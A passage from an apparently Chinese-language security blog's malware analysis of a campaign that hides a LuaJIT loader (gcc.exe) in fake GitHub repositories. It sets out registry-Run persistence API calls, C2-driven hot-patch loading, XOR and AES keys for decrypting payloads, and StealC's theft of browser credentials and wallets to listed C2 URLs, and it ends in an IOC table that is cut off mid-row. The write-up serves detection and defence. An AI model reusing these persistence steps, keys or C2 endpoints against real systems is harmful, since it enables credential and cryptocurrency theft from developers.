leaf="">load(C2响应)</span></code><span leaf=""> → 递归执行热补丁（进入 Mode 2）</span></p></li></ol><p data-line="378" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Mode 2（后续运行，状态文件已存在）</span></strong><span leaf="">：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">io.open(&#34;{MachineGuid}.json&#34;, &#34;rb&#34;)</span></code><span leaf=""> → 读取状态文件</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load(状态文件内容)()</span></code><span leaf=""> → 获取状态表</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetModuleFileNameW(NULL)</span></code><span leaf=""> → 获取 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 完整路径</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">RegCreateKeyExW(HKCU, &#34;Software\Microsoft\Windows\CurrentVersion\Run&#34;)</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">RegSetValueExW(key, &#34;gcc&#34;, REG_SZ, &#34;&lt;path&gt;\gcc.exe ptd.txt&#34;)</span></code><span leaf=""> — 注册表自启动</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CopyFileW(src, dst)</span></code><span leaf=""> → 将 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 和 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 复制到持久化目录</span></p></li></ol><figure data-line="386" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img alt="双模式状态机流程图" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027787" data-ratio="0.5583333333333333" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=df1d0c3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWJrHz7XkocXzqCicEPr0EXzicOTQNzmmMjzib00HRuRglPu8OOBVjBImjSpwcuuT7ymzoNfLBib7djPv6ibOib6Z5ylyvBnBEIx1ZlY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">双模式状态机流程图</span></figcaption></figure><p data-line="389" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这种双模式架构体现了攻击者精密的运营逻辑：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2 运营者在收到截图后可以人工审核受害者价值，决定是否向该目标投递后续载荷</span></strong><span leaf="">。首次上传仅返回 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">{status=&#34;ok&#34;}</span></code><span leaf="">，后续运行才可能触发真正的恶意行为。状态文件以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">MachineGuid</span></code><span leaf=""> 命名，实现了每机器唯一的状态追踪，防止同一机器重复上传截图浪费 C2 带宽。</span></p><p data-line="391" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">此外，热补丁还实现了一个</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">自我更新的持久化循环</span></strong><span leaf="">：C2 响应中始终包含下一版本的热补丁代码，通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">load()</span></code><span leaf=""> 动态加载执行，无需写入磁盘，规避基于文件的检测。攻击者可随时在响应中下发新版逻辑，而无需重新感染受害者。</span></p><h4 data-line="393" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">3.3 载荷落定：GitHub 中转仓库与 StealC 木马</span></h4><p data-line="395" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">持久化建立后，样本从 GitHub 载荷中转仓库（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">github.com/Mahmudul-Riad/www</span></code><span leaf="">）拉取最终载荷。两个加密 Blob 文件经过统一的解密链处理：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">hex</span></span><span leaf="">-encoded blob</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  → </span><span style="color: rgb(0, 72, 171);"><span leaf="">hex</span></span><span leaf=""> decode</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">  → XOR decrypt（密钥：ECe6VGLRJum2qYtl79OiOU7aHot7Zhbn）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">       ├─ index/</span><span style="color: rgb(76, 129, 201);"><span leaf="">7.</span></span><span leaf="">txt → 297KB 混淆 Lua 热补丁脚本</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">       └─ index/</span><span style="color: rgb(76, 129, 201);"><span leaf="">8.</span></span><span leaf="">txt → </span><span style="color: rgb(76, 129, 201);"><span leaf="">1.18</span></span><span leaf="">MB PE Crypter Stub（x64，含 AES-</span><span style="color: rgb(76, 129, 201);"><span leaf="">256</span></span><span leaf=""> 加密的 StealC）</span></p></code></pre></p><p data-line="405" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">值得注意的是，XOR 解密密钥 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ECe6VGLRJum2qYtl79OiOU7aHot7Zhbn</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">bot_info</span></code><span leaf=""> 字段的加密密钥</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">完全相同</span></strong><span leaf="">。同一密钥在整个攻击链中承担双重职责：既用于解密 GitHub 中转仓库载荷，也用于加密上传的受害者信息。</span></p><p data-line="407" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过分析 PE Crypter Stub（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">decrypted_8.bin</span></code><span leaf="">）</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.text</span></code><span leaf=""> 节中的 AVX2 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">vpxor</span></code><span leaf=""> 指令，提取到 AES-256 密钥 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">51AabzlG90_c_K9JZ8YXRGTOFralTd8k</span></code><span leaf="">，最终解密获得 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">StealC</span></strong><span leaf="">（build6）木马。该木马利用 RC4 解密配置（密钥：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dVhllnj7MBHRDVTFDT</span></code><span leaf="">），对受害者的浏览器凭证（Chrome/Edge/Brave，含 App-Bound Encryption 绕过）、加密货币扩展钱包（MetaMask 等）、Firefox NSS3 数据库及 Steam 配置文件展开全面扫荡，并通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php" target="_blank">http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php</a></span></code><span leaf=""> 回传。</span></p><p data-line="409" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><em style="font-style: italic;font-size: inherit;"><span leaf="">(本节涉及的核心 IOCs 如下)：</span></em></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Loader 活跃 C2</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://89.169.12.241" target="_blank">http://89.169.12.241</a></span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">StealC 回传 C2</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php" target="_blank">http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php</a></span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Polygon C2 合约</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x1823A9a0Ec8e0C25dD957D0841e3D41a4474bAdc</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">XOR/bot_info 密钥</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ECe6VGLRJum2qYtl79OiOU7aHot7Zhbn</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AES-256 密钥</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">51AabzlG90_c_K9JZ8YXRGTOFralTd8k</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">MaaS Affiliate ID</span></strong><span leaf="">: </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">loaderId=839</span></code></p></li></ul><h2 data-line="417" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">三、 受害者画像：广撒网下的“效率至上”小白和AI智能体</span></h2><p data-line="419" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在梳理完这套硬核的攻击链路后，我们发现：这并非一场针对特定企业或高价值目标的 APT 定向狙击，而是一次利用 AI 技术武装到牙齿的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">工业化“广撒网”</span></strong><span leaf="">。</span></p><p data-line="421" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者利用大模型极低的文本和代码生成成本，批量伪造了数百个有着精美 Readme、看似活跃提交记录的代码仓库。这些诱饵如同散落在开源荒原上的无数捕兽夹，静静等待猎物踏入。</span></p><p data-line="423" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">而踩中陷阱的，正是当下这个时代最典型的技术群体——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">SaaS 与自动化工具的重度依赖者以及为他们服务的AI智能体</span></strong><span leaf="">。</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">行业属性：追求“开箱即用”的拼凑者</span></strong><span leaf=""> 无论是抓取语料的数据工程师、编排 API 流程的 SaaS 集成者，还是部署 Docker 容器的运维人员，他们都有一个共同点：极度追求效率。在他们眼中，GitHub 是一个免费的零件库。当遇到一个需求（如对接某个大模型或抓取某个平台）时，第一反应是搜索现成的自动化小工具，而非自己从头编写。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">技术依赖度：丧失警惕的“克隆即运行”</span></strong><span leaf=""> 现代开发流程的简化，让他们对开源代码产生了近乎盲目的信任。尤其是那些仅仅几十上百行的“胶水代码”或脚本工具，极少有人会去逐行审计。当开发者习惯了通过命令行（甚至是通过 AI Agent 助手如 Openclaw、Claude code）直接 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git clone</span></code><span leaf=""> 并一键运行安装脚本时，他们实际上已经亲手为恶意代码让出了系统的最高执行权限。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">经济价值：终端即金库</span></strong><span leaf=""> 虽然是广撒网，但这群开发者的终端电脑却是毫无疑问的高价值资产库。从 StealC 窃密木马的目标配置来看，攻击者进行的是极其高效的“数字收割”——开发者的浏览器往往装有 MetaMask 等加密货币钱包插件，环境变量中存有云服务凭证（AWS/GCP Keys），本地目录下有着直通企业核心源码的 SSH 私钥。一次盲目的下载，付出的往往是倾家荡产的代价。</span></p></li></ol><h2 data-line="432" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">四、 核心 IOC 汇总</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);width:543px;"><thead><tr><th data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></th><th data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IOC</span></p></th><th data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">说明</span></p></th></tr></thead><tbody><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">IP</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">213.176.73.162</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始 C2 服务器 IP，用于接收受害者的屏幕截图与侦察信息</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">URL</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://89.169.12.241" target="_blank">http://89.169.12.241</a></span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Loader 阶段最新活跃 C2 地址（由区块链动态下发）</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">URL</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php" target="_blank">http://213.176.72.200/3d9c1a1d0dc9436eb7b7.php</a></span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">StealC 木马最终的凭证窃取回传 C2 接口</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">MD5</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">a5edd208f0f92184a06b9dfb8eb5acee</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><p><span leaf=""> 文件哈希（被利用作为核心载荷启动器的 LuaJIT 解释器）</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Contract</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x1823A9a0Ec8e0C25dD957D0841e3D41a4474bAdc</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">部署在 Polygon 主网的智能合约地址，用于 EtherHiding 动态寻址</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Key</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ECe6VGLRJum2qYtl79OiOU7aHot7Zhbn</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">XOR 加密密钥，用于加密 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">bot_info</span></code><span leaf=""> 并在载荷解密链中复用</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Key</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">51AabzlG90_c_K9JZ8YXRGTOFralTd8k</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">AES-256 密钥，用于解密最终的 StealC 木马载荷</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Key</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dVhllnj7MBHRDVTFDT</span></code></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">RC4 密钥，用于解密 StealC 木马的窃密目标配置</span></p></td></tr><tr><td data-colwidth="93" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">GitHub Account</span></strong></td><td data-colwidth="231" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">damiansilverado</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 